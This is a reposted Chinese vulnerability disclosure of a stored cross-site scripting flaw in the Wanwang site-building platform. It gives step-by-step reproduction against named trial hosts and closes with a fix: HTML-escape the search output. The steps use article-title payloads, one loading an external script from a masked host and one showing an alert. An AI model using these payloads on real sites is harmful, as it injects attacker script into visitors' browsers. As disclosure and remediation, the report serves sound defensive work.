好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

万网建站平台存储型XSS - 网站安全 - 自学php

 

简要描述:未对搜索输出内容进行转义,导致构造的畸形文件名插入JS代码

详细说明:1.访问地址:

http://try5.mynet.cn/trial/login.aspx生成网站

2.在首页- 信息发布- 文章管理- 新建文章 添加文章标题为

"><script src='http://****.com/bk.js'></script><"或

"><script>alert('bk7477890')</script><"并保存文章

 

3.在站内搜索中搜索任意文章标题字符,如"s"

 

4.访问地址

http://a243220688.try5.mynet.cn/_d8.htm?k=s出现 漏洞

 

 

 

漏洞证明:访问地址

http://a243220688.try5.mynet.cn/_d8.htm?k=s出现漏洞

 

 

修复方案:对搜索控件输出内容进行HTML转义

 

作者  iceks

查看更多关于万网建站平台存储型XSS - 网站安全 - 自学php的详细内容...

  阅读:44次